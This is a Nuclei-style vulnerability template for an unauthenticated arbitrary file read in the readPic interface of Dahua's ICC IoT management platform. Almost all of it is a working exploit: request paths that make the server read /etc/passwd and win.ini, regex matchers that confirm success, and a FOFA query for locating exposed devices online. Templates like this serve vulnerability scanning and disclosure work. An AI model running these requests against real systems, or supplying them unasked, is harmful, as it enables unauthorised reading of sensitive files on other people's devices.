id: dahua-icc-readPic-fileread

info:
  name: 大华 icc 智能物联综合管理平台 readPic - fileread
  author: leadlife
  severity: high
  description: 大华 ICC 智能物联综合管理平台对技术组件进行模块化和松耦合，将解决方案分层分级，提高面向智慧物联的数据接入与生态合作能力。该平台的readpic接口存在任意文件读取漏洞，未经身份验证的攻击者可以获取系统内部敏感文件信息，使系统处于极不安全的状态。
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: body="/static/fontshd/font-hd.css" || icon_hash="-1935899595" || body="*客户端会小于800*" 
  tags: dahua,fileread,iot,icc

http:
  - method: GET
    path:
      - "{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:///etc/passwd"
      - "{{BaseURL}}/evo-apigw/evo-cirs/file/readPic?fileUrl=file:///c:/windows/win.ini"
    
    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or